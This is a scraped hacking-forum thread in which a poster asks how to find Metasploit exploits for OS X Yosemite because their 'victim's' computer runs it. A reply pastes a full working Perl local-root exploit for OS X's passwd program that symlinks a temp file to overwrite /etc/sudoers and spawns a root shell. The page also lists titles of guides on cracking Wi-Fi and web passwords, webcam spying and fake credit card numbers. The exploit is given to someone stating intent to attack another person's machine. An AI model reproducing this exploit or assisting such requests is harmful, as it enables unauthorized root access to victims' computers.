Well, I started to use metasploit and I tried to search some exploits for Mac OS X Yosemite, but there were nothing. Is the OS too safe to get hacked with metasploit or what's the problem? I really want to solve this problem, cause my victims Computer is running on OSX. Any Ideas?
Forum Thread:
How to Control Android Tablets from PC?
0
Replies
Forum Thread:
Hacking Devices Without Payload?!
2
Replies
Forum Thread:
Can I Access Admin Page Through an Unauthorized IP ?
0
Replies
Forum Thread:
This Is a Question I've Always Wanted to Ask(Need Answers from Experienced Hackers)
5
Replies
Forum Thread:
How to Use Metasploit to Hack Android Phones Over WAN Using Your Own Android Hotspot. (Expert Hackers).
2
Replies
Reverse Connection Fails:
Metasploit
8
Replies
Forum Thread:
How to Test Payloads on the Same Computer on Different Networks (With Pictures)
0
Replies
Forum Thread:
Dot Know What Is Actually Going on with My Kali System. I Think It's a Serious Issue with Terminal
2
Replies
Forum Thread:
How To Know If an Open Ports is Vulnerable
4
Replies
Forum Thread:
How to Hack Wifi Network with CMD
56
Replies
Forum Thread:
Windows 10 Exploits
13
Replies
Forum Thread:
Kali Linux 2.0 Network Problems
10
Replies
Forum Thread:
How to Crack Window Password with Kali Live Usb
6
Replies
Forum Thread:
Privilege Escalation on Android
1
Replies
Forum Thread:
Catching/Analysing Malware with New Dionaea Version
3
Replies
Forum Thread:
Is There Today a Real Way of Bypassing AV ?
10
Replies
Forum Thread:
So...You Want to Be a Hacker?
17
Replies
Forum Thread:
How to Get Root Access for Meterpreter?
2
Replies
Forum Thread:
Wifi Connection Keeps Dropping in Kali.
0
Replies
Forum Thread:
How to Take a ScreenShot of Android Screen Using Metasploit Payload
11
Replies
How To:
Wardrive with the Kali Raspberry Pi to Map Wi-Fi Devices
How To:
4 Ways to Crack a Facebook Password & How to Protect Yourself from Them
How to Hack Wi-Fi:
Get Anyone's Wi-Fi Password Without Cracking Using Wifiphisher
Hack Like a Pro:
How to Secretly Hack Into, Switch On, & Watch Anyone's Webcam Remotely
How To:
Get Unlimited Free Trials Using a "Real" Fake Credit Card Number
How To:
Set Up a Headless Raspberry Pi Hacking Platform Running Kali Linux
How to Hack Wi-Fi:
Cracking WPA2-PSK Passwords Using Aircrack-Ng
How To:
Successfully Hack a Website in 2016!
How to Hack Wi-Fi:
Capturing WPA Passwords by Targeting Users with a Fluxion Attack
How To:
Hack Windows 7 (Become Admin)
How To:
The Hacks Behind Cracking, Part 1: How to Bypass Software Registration
Hack Like a Pro:
How to Find Vulnerabilities for Any Website Using Nikto
Hack Like a Pro:
How to Exploit and Gain Remote Access to PCs Running Windows XP
How To:
The Essential Skills to Becoming a Master Hacker
How to Hack Wi-Fi:
Cracking WPA2-PSK Passwords with Cowpatty
How To:
Hack Android Using Kali (Remotely)
Hack Like a Pro:
How to Spy on Anyone, Part 1 (Hacking Computers)
Hack Like a Pro:
How to Crack Online Web Form Passwords with THC-Hydra & Burp Suite
How To:
Crack Wi-Fi Passwords with Your Android Phone and Get Free Internet!
How To:
Hack WPA WiFi Passwords by Cracking the WPS PIN
4 Responses
There are numerous exploits for OS X in Metasploit. Look again. In addition, check exploitdb for exploits or securityfocus.com. There are numerous exploits for OS X. It is far from safe!
Yeah, thanks. But with which kind of program do I use script like this:
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#!/usr/bin/perl
#
# /usr/bin/passwdOSX: local root exploit.
#
# by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)
#
# (Apple) OSX's /usr/bin/passwd program has support for a custom
# passwd file to be used instead of the standard/static path. this
# feature has security issues in the form of editable file(s) being
# made anywheres on the disk and also writing arbitrary data to files.
#
# the first issue will only work if the file does not already exist,
# it is done using "umask 0;/usr/bin/passwd -i file -l <filename>".
# the second issue is once a successful password change has occured
# /usr/bin/passwd will insecurely re-write the passwd file to
# /tmp/.pwtmp.<pid>, which can be predicted and linked to a file of
# your choice. (this exploits the second issue to overwrite
# /etc/sudoers)
#
# (for some reason this took apple 6 or so months to patch)
use POSIX;
$fakepasswd="/tmp/xpasswd.$$";
$passwdpid=($$ + 1);
$passwdtempfile="/tmp/.pwtmp.$passwdpid";
$sudoers="/etc/sudoers";
sub pexit{print("! @.\n");exit(1);}
print("* /usr/bin/passwdOSX: local root exploit.\n");
print("* by: vade79/v9 v9\@fakehalo.us (fakehalo/realhalo)\n\n");
unlink($fakepasswd);
print("* making fake password file. ($fakepasswd)\n");
open(FP,">$fakepasswd")||pexit("couldn't open/write to $fakepasswd");
# uid must equal the current user.
print(FP "ALL ALL=(ALL) ALL #::" . getuid . ":" . getuid . "::" .
getuid . ":" . getuid . "::/:/\n");
close(FP);
print("* sym-linking $sudoers -> $passwdtempfile.\n");
symlink($sudoers,$passwdtempfile)||pexit("couldn't link files.");
print("* running /usr/bin/passwd on $fakepasswd.\n");
print("* (use ANY password longer than 4 characters)\n\n");
system("/usr/bin/passwd -i file -l $fakepasswd \"ALL ALL=(ALL) ALL #\"");
print("\n* running \"sudo sh\", use your REAL (user) password.\n\n");
system("/usr/bin/sudo sh");
exit(0);
That is a Perl script.
Security Focus is what I use. Sometimes they have the exploits already there.
Share Your Thoughts